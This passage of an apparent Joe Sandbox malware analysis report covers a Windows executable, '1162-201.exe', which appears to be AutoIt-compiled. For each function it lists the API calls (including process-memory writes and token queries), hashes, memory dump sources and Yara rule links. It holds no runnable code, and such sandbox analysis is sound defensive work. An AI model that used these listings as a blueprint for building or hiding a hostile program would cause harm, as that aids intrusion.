                                                                      • Instruction ID: 7d8332a6af61c0c82c3134e204095ce6ca8c1b8de23f9561fff56f4de46a8ae7
                                                                      • Opcode Fuzzy Hash: 1e9447ea1817f109f5c86e7bde08b8ce4b2f814d7d975e9b1ca87d048f1c0d09
                                                                      • Instruction Fuzzy Hash: 1601DB72600204BFDB506F68DC88BAE7BEDEF44396F244224F805D2210E776CE449BA0
                                                                      Function 00C8E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00C8E997
                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 00C8E9A5
                                                                      • Sleep.KERNEL32(00000000), ref: 00C8E9AD
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00C8E9B7
                                                                      • Sleep.KERNEL32 ref: 00C8E9F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                      • String ID:
                                                                      • API String ID: 2833360925-0
                                                                      • Opcode ID: 636e757794cfeaf8f44bf716827dfab26f3d2c41321166d4c4643ac45ea105d7
                                                                      • Instruction ID: 8aebc772cc028b41bdb66911ece180ede6dd95224caefbf24a29ebb0f28d84e6
                                                                      • Opcode Fuzzy Hash: 636e757794cfeaf8f44bf716827dfab26f3d2c41321166d4c4643ac45ea105d7
                                                                      • Instruction Fuzzy Hash: 70016931C01629DBCF00AFE9DC89BEDBB78FF08305F000656E952B2250CB709651CBA5
                                                                      Function 00C81014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C8102A
                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C81036
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C81045
                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C8104C
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C81062
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: 01ad53a931b0eef192c954e8e6c1a5570afdc72da632ebe925ad2212d4b7a7ac
                                                                      • Instruction ID: 41d9bfcbcbb42c1fe285f4225cde11ca0ae5ff8f382ed207c7f0c0f1b8b3b751
                                                                      • Opcode Fuzzy Hash: 01ad53a931b0eef192c954e8e6c1a5570afdc72da632ebe925ad2212d4b7a7ac
                                                                      • Instruction Fuzzy Hash: 8BF04975200301ABDB216FA8EC89F5B3BADEF89761F140525FA45D6250CA70DD518A60
                                                                      Function 00C80FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C80FCA
                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C80FD6
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C80FE5
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C80FEC
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C81002
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: b83bebce97224d677c9b0a4a941627420811ce93ebe289e3ab92dc7485d66f4d
                                                                      • Instruction ID: b9857c1b89ebd7ffa35d2dea853aa375aa2625471c154ad9379295789c3b9cee
                                                                      • Opcode Fuzzy Hash: b83bebce97224d677c9b0a4a941627420811ce93ebe289e3ab92dc7485d66f4d
                                                                      • Instruction Fuzzy Hash: FFF04975200301AFDB216FA8AC89F5A3BADEF89762F144525FA45D6251CA70DC518A60
                                                                      Function 00C9030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C9017D,?,00C932FC,?,00000001,00C62592,?), ref: 00C90324
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C9017D,?,00C932FC,?,00000001,00C62592,?), ref: 00C90331
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C9017D,?,00C932FC,?,00000001,00C62592,?), ref: 00C9033E
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C9017D,?,00C932FC,?,00000001,00C62592,?), ref: 00C9034B
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C9017D,?,00C932FC,?,00000001,00C62592,?), ref: 00C90358
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C9017D,?,00C932FC,?,00000001,00C62592,?), ref: 00C90365
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: e639e0d65164dd435dd071801506fdbb70ccd9281283453a171a4c96dd6d0c65
                                                                      • Instruction ID: 9d9a029a0a73f742030d0c069d8e41445c799f0015b8f0fda99a440b208366d5
                                                                      • Opcode Fuzzy Hash: e639e0d65164dd435dd071801506fdbb70ccd9281283453a171a4c96dd6d0c65
                                                                      • Instruction Fuzzy Hash: 4F01AE72800B159FCB30AF66D880816FBF9BF603153258A3FD1A652931C3B1AA58DF80
                                                                      Function 00C5D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00C5D752
                                                                        • Part of subcall function 00C529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000), ref: 00C529DE
                                                                        • Part of subcall function 00C529C8: GetLastError.KERNEL32(00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000,00000000), ref: 00C529F0
                                                                      • _free.LIBCMT ref: 00C5D764
                                                                      • _free.LIBCMT ref: 00C5D776
                                                                      • _free.LIBCMT ref: 00C5D788
                                                                      • _free.LIBCMT ref: 00C5D79A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: b1fd1881c668d293e30926661fc738ab50a48054fdd12b7051d8dc920a1b9ef9
                                                                      • Instruction ID: 472eb8eb85b3daf3c88c5f24c546d970b07b7a774f6fa2600a3cec82fcb018fc
                                                                      • Opcode Fuzzy Hash: b1fd1881c668d293e30926661fc738ab50a48054fdd12b7051d8dc920a1b9ef9
                                                                      • Instruction Fuzzy Hash: D5F06236500348AB8635EB64F9C2E5A7BDDBB093527A40805F869EB646C730FCC48668
                                                                      Function 00C85C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00C85C58
                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C85C6F
                                                                      • MessageBeep.USER32(00000000), ref: 00C85C87
                                                                      • KillTimer.USER32(?,0000040A), ref: 00C85CA3
                                                                      • EndDialog.USER32(?,00000001), ref: 00C85CBD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 3741023627-0
                                                                      • Opcode ID: 81451ff8501fb15d66fe3a44180c9e859300550bdea01e6097441f6124372be9
                                                                      • Instruction ID: 378738cdd5c124679f733f53a77ba13db381091ea2debcd477bd74601b7693f5
                                                                      • Opcode Fuzzy Hash: 81451ff8501fb15d66fe3a44180c9e859300550bdea01e6097441f6124372be9
                                                                      • Instruction Fuzzy Hash: B501A930540B14ABEB316B10DD8EFAA77B8BF04B05F001659B593A14E1DBF0AE84DF94
                                                                      Function 00C395C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EndPath.GDI32(?), ref: 00C395D4
                                                                      • StrokeAndFillPath.GDI32(?,?,00C771F7,00000000,?,?,?), ref: 00C395F0
                                                                      • SelectObject.GDI32(?,00000000), ref: 00C39603
                                                                      • DeleteObject.GDI32 ref: 00C39616
                                                                      • StrokePath.GDI32(?), ref: 00C39631
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                      • String ID:
                                                                      • API String ID: 2625713937-0
                                                                      • Opcode ID: 5aff354424f3d81019fbd99b098c32347a0eaa76bc3ba93d52a88806027d2414
                                                                      • Instruction ID: b2ae26f280753327c0760b03f8d42429fc2735982475f9f690f0949710afaf5b
                                                                      • Opcode Fuzzy Hash: 5aff354424f3d81019fbd99b098c32347a0eaa76bc3ba93d52a88806027d2414
                                                                      • Instruction Fuzzy Hash: D3F03C30006204EBDB126F69ED5C7BD3B75EB10322F088314F866550F0C7B08A91DFA2
                                                                      Function 00C50F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: __freea$_free
                                                                      • String ID: a/p$am/pm
                                                                      • API String ID: 3432400110-3206640213
                                                                      • Opcode ID: 57fbddcf6fac9872d618ce68da1f9be16913f50233e6cc9a335457ff2a151c66
                                                                      • Instruction ID: 8200fdc860db1ebf36e024221dc27c4da8a9ae564bc36e13b413b450d38a4c38
                                                                      • Opcode Fuzzy Hash: 57fbddcf6fac9872d618ce68da1f9be16913f50233e6cc9a335457ff2a151c66
                                                                      • Instruction Fuzzy Hash: C1D1F339900246DACB249F69C86DBBEB7B0FF05702F2C0159ED219B661D3359EC8CB59
                                                                      Function 00CA7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C40242: EnterCriticalSection.KERNEL32(00CF070C,00CF1884,?,?,00C3198B,00CF2518,?,?,?,00C212F9,00000000), ref: 00C4024D
                                                                        • Part of subcall function 00C40242: LeaveCriticalSection.KERNEL32(00CF070C,?,00C3198B,00CF2518,?,?,?,00C212F9,00000000), ref: 00C4028A
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                        • Part of subcall function 00C400A3: __onexit.LIBCMT ref: 00C400A9
                                                                      • __Init_thread_footer.LIBCMT ref: 00CA7BFB
                                                                        • Part of subcall function 00C401F8: EnterCriticalSection.KERNEL32(00CF070C,?,?,00C38747,00CF2514), ref: 00C40202
                                                                        • Part of subcall function 00C401F8: LeaveCriticalSection.KERNEL32(00CF070C,?,00C38747,00CF2514), ref: 00C40235
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                      • String ID: 5$G$Variable must be of type 'Object'.
                                                                      • API String ID: 535116098-3733170431
                                                                      • Opcode ID: 1be8c5c631b979465d52f741129060185fe02ddf6cdc1393a514c0e80a60967f
                                                                      • Instruction ID: e57555218613fc021f4ea0d3c51cb577b50df93a4dc0164ed5a8aa3d0557da14
                                                                      • Opcode Fuzzy Hash: 1be8c5c631b979465d52f741129060185fe02ddf6cdc1393a514c0e80a60967f
                                                                      • Instruction Fuzzy Hash: 2091AC70A0420AEFCB14EF94D891DBDB7B1FF4A308F108159F8169B292DB71AE45DB51
                                                                      Function 00C82716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C8B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C821D0,?,?,00000034,00000800,?,00000034), ref: 00C8B42D
                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C82760
                                                                        • Part of subcall function 00C8B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C821FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00C8B3F8
                                                                        • Part of subcall function 00C8B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00C8B355
                                                                        • Part of subcall function 00C8B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C82194,00000034,?,?,00001004,00000000,00000000), ref: 00C8B365
                                                                        • Part of subcall function 00C8B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C82194,00000034,?,?,00001004,00000000,00000000), ref: 00C8B37B
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C827CD
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C8281A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                      • String ID: @
                                                                      • API String ID: 4150878124-2766056989
                                                                      • Opcode ID: 1e2cba21dfdfd25aeef0149a4273950440a0e8e37135c695d476f6ef76b61441
                                                                      • Instruction ID: 08a186a50396027fcbce642f3c923d29e2735ecdc3354602cbb11d1e35219dc0
                                                                      • Opcode Fuzzy Hash: 1e2cba21dfdfd25aeef0149a4273950440a0e8e37135c695d476f6ef76b61441
                                                                      • Instruction Fuzzy Hash: 35413C72900218BFDB10EBA4CD86BEEBBB8AF09304F004059FA55B7191DB706E45DBA0
                                                                      Function 00C5172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\1162-201.exe,00000104), ref: 00C51769
                                                                      • _free.LIBCMT ref: 00C51834
                                                                      • _free.LIBCMT ref: 00C5183E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _free$FileModuleName
                                                                      • String ID: C:\Users\user\Desktop\1162-201.exe
                                                                      • API String ID: 2506810119-2769687655
                                                                      • Opcode ID: 45f80e817b811bbb32b91ca53948c0ba399a16164ff13af3e638104d1be3a88a
                                                                      • Instruction ID: 583e65ce548ff54fba9f8a4f5f60501bbe8621e0f3a07fcb54ebec54ba36e82b
                                                                      • Opcode Fuzzy Hash: 45f80e817b811bbb32b91ca53948c0ba399a16164ff13af3e638104d1be3a88a
                                                                      • Instruction Fuzzy Hash: F631C279A00218EFCB21DF99DC88FAEBBFCEB89351B184166FC1097211D6704E84DB94
                                                                      Function 00C8C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C8C306
                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00C8C34C
                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CF1990,00F54868), ref: 00C8C395
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Delete$InfoItem
                                                                      • String ID: 0
                                                                      • API String ID: 135850232-4108050209
                                                                      • Opcode ID: 8ab16d83ec5ca79354d68259b71b27f9285d27aad7b228416bed62541359ffb1
                                                                      • Instruction ID: b72f24847629e6b305b1a0d47d9ae9d2a6eeb05f77d4d9b7955477161648c0b4
                                                                      • Opcode Fuzzy Hash: 8ab16d83ec5ca79354d68259b71b27f9285d27aad7b228416bed62541359ffb1
                                                                      • Instruction Fuzzy Hash: 3141A2312043019FD720EF25D8C5B9ABBE4EF85318F14861EF9A5972E1D730E905DB66
                                                                      Function 00C895AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                      • API String ID: 176396367-2734436370
                                                                      • Opcode ID: e2b11ca72a11a041d65151f5ceb7c41d277c98603a65f8f6e17dd08007460cd7
                                                                      • Instruction ID: 1152486669d2a52b377487f02c82876c91d3aa8f13a0bd50849e79c8a1dd4eaf
                                                                      • Opcode Fuzzy Hash: e2b11ca72a11a041d65151f5ceb7c41d277c98603a65f8f6e17dd08007460cd7
                                                                      • Instruction Fuzzy Hash: C8213832204520A6C331BA259C02FBB7398EF51308F18403AF95997141FB719E46D399
                                                                      Function 00C949F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C94A08
                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C94A5C
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,00CBCC08), ref: 00C94AD0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$InformationVolume
                                                                      • String ID: %lu
                                                                      • API String ID: 2507767853-685833217
                                                                      • Opcode ID: 755af88ccea3dac25f414996c642bd0847bdaaa6476e82a6de67784ff28f4b5f
                                                                      • Instruction ID: b632729fcaa4ebdc4184192042ab5c95c59fee3dce088eb547f63f51305c0578
                                                                      • Opcode Fuzzy Hash: 755af88ccea3dac25f414996c642bd0847bdaaa6476e82a6de67784ff28f4b5f
                                                                      • Instruction Fuzzy Hash: 3A316171A00108AFDB10DF54C885EAE7BF8EF04308F1440A5F905EB252DB71EE46DB61
                                                                      Function 00C82F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
